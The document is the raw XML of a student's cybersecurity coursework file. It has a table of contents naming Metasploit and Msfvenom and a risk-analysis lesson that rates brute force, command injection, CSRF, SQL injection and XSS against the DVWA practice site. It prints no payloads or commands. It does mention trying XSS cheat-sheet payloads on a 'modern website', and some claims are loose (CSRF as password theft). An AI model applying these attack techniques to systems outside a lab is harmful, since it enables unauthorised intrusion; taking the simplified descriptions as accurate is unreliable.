            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21954D85" w14:textId="5C526345" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782563" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782563 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77CBBA69" w14:textId="5631B590" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782564" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Metasploitable Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782564 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DBB38D7" w14:textId="7A382957" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782565" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Msfvenom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782565 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7280831E" w14:textId="705CDAFA" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782566" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782566 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47330F22" w14:textId="1E48743C" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782567" w:history="1">
            <w:r w:rsidRPr="00D20450">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5782567 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="281A1B97" w14:textId="0CD8614C"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5782511"/>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 xml:space="preserve">My name is Mohammed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alshukaili</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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5782512"/>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lastRenderedPageBreak/>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5782513"/>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5782514"/>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5782515"/>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5782516"/>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lastRenderedPageBreak/>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5782517"/>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lastRenderedPageBreak/>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5782518"/>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5782519"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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lastRenderedPageBreak/>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13D0EFD9" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc115782520"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 1.3 (Risk Analysis)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="518E254F" w14:textId="553A1A7E" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311748F6" w14:textId="6556E280" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513C403C" w14:textId="34328500" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I will try to find vulnerabilities in the DVWA website and based on them I will measure the risk of the different attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11250EF8" w14:textId="4DAF7E5F" w:rsidR="003B0146" w:rsidRDefault="003B0146" w:rsidP="003B0146">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Probability x Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46786324" w14:textId="1E6A9CAB" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Brute Force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B091672" w14:textId="2021C2A3" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Brute force is trying to guess the user credentials using existing files full of usernames and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34A79E" w14:textId="1CA42907" w:rsidR="00A07D28" w:rsidRDefault="00A07D28" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The frustrating thing for the attacker about this attack is that they need to have the password in a file. </w:t>
      </w:r>
      <w:r w:rsidR="005023A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The chance of finding your own password in a Kali file or downloaded files is so rare, unless you use easy passwords like admin, password123, 12345, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6B6DA" w14:textId="5C1056A8" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The other thing that is stopping the attacker is that the website could block their ip address from sending requests when they brute force. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9482A" w14:textId="608FD3F5" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For these reasons I would give brute force </w:t>
      </w:r>
      <w:r w:rsidRPr="005023A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Low Probability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Although, if the attacker got lucky and found the user credentials, the impact against the user would be enormous, therefore I think brute force has </w:t>
      </w:r>
      <w:r w:rsidRPr="005023A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>very high (5) impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C348DB" w14:textId="7DAF2F15" w:rsidR="003B0146" w:rsidRDefault="003B0146" w:rsidP="003B0146">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64058600" w14:textId="77777777" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01092D67" w14:textId="038073BB" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="005023A7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B723A4D" w14:textId="218070D1" w:rsidR="005023A7" w:rsidRDefault="005023A7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is the attack when the attacker gets to execute commands on a remote target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5774B361" w14:textId="6CF465A4" w:rsidR="005023A7" w:rsidRDefault="00313BE7" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I found it super difficult to understand at first. However</w:t>
      </w:r>
      <w:r w:rsidR="00442F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> I managed to gain the access for many remote targets.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1BCE56" w14:textId="6A7C587C" w:rsidR="00442F0F" w:rsidRDefault="00442F0F" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Even if you got into systems’ CLI, you most likely will not get all the permission </w:t>
      </w:r>
      <w:r w:rsidR="00785C7B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to execute anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Therefore, I think that this vulnerability is somewhere between medium and high </w:t>
      </w:r>
      <w:r w:rsidRPr="003B0146">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>impact (3 or 4).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> And I think the probability is </w:t>
      </w:r>
      <w:r w:rsidRPr="003B0146">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>average</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36100461" w14:textId="7E3D90A2" w:rsidR="003B0146" w:rsidRDefault="003B0146" w:rsidP="003B0146">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B8BD3" w14:textId="77777777" w:rsidR="003B0146" w:rsidRDefault="003B0146" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D79F1CA" w14:textId="1A3D7C1F" w:rsidR="00442F0F" w:rsidRDefault="00442F0F" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CF6B68" w14:textId="07584CD3" w:rsidR="00442F0F" w:rsidRDefault="00442F0F" w:rsidP="00A07D28">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393CBD57" w14:textId="32EA9B4F" w:rsidR="00442F0F" w:rsidRDefault="00785C7B" w:rsidP="00442F0F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00442F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5501EF" w14:textId="51D9C9C4" w:rsidR="00785C7B" w:rsidRDefault="00785C7B" w:rsidP="00785C7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This trick can get so frustrating because you are trying force the victim to do something.</w:t>
      </w:r>
      <w:r w:rsidR="00A0109C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> I think the probability for this is </w:t>
      </w:r>
      <w:r w:rsidR="00A0109C" w:rsidRPr="003B0146">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:r w:rsidR="00A0109C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> because nowadays, people are aware of the social engineering methods and tend to avoid being the victim. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E44A3" w14:textId="1AE28DFD" w:rsidR="00A0109C" w:rsidRDefault="00A0109C" w:rsidP="00785C7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The impact for this I would say is </w:t>
      </w:r>
      <w:r w:rsidRPr="003B0146">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>high (4).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the attacker gets your password, they can harm you in so many ways. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DF58F" w14:textId="58A20A1F" w:rsidR="003B0146" w:rsidRDefault="003B0146" w:rsidP="003B0146">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC524E" w14:textId="4FEE384D" w:rsidR="00A0109C" w:rsidRDefault="00A0109C" w:rsidP="00785C7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5AFDE0" w14:textId="48589BC1" w:rsidR="00A0109C" w:rsidRDefault="00A0109C" w:rsidP="00A0109C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5C20DF" w14:textId="642FCD36" w:rsidR="00A0109C" w:rsidRDefault="0059447E" w:rsidP="00A0109C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL injection aims to affect the databases. Modern developers pay so much attention for this vulnerability because they are aware of how powerful it can be against their applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42739ACB" w14:textId="77777777" w:rsidR="0059447E" w:rsidRDefault="0059447E" w:rsidP="00A0109C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Developers tend to use modern technology full of rules that blocks SQLi to decrease the risk of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE173A" w14:textId="02AD9A85" w:rsidR="0059447E" w:rsidRDefault="0059447E" w:rsidP="00A0109C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I think the SQLi impact is </w:t>
      </w:r>
      <w:r w:rsidRPr="003B0146">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>high (4).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, the probability is </w:t>
      </w:r>
      <w:r w:rsidRPr="003B0146">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D92E4" w14:textId="57C29693" w:rsidR="00D96E60" w:rsidRDefault="00D96E60" w:rsidP="00D96E60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73466398" w14:textId="77777777" w:rsidR="00F8386D" w:rsidRDefault="00F8386D" w:rsidP="00A0109C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E67BBB9" w14:textId="1F5D6764" w:rsidR="00F8386D" w:rsidRDefault="00F8386D" w:rsidP="00F8386D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS (DOM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E074CD" w14:textId="52BA6EB7" w:rsidR="0059447E" w:rsidRDefault="0059447E" w:rsidP="00A0109C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F8386D">
        <w:rPr>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Pr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">codes for this attack on </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="003B0146" w:rsidRPr="00734E17">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B0146">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> but I tried so many and I could not execute one against modern website. </w:t>
      </w:r>
      <w:r w:rsidR="00D96E60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The probability is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D96E60" w:rsidRPr="00D96E60">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>average</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D96E60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the impact is </w:t>
      </w:r>
      <w:r w:rsidR="00D96E60" w:rsidRPr="00D96E60">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>medium</w:t>
      </w:r>
      <w:r w:rsidR="00D96E60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55364922" w14:textId="14A37E13" w:rsidR="00D96E60" w:rsidRDefault="00D96E60" w:rsidP="00D96E60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
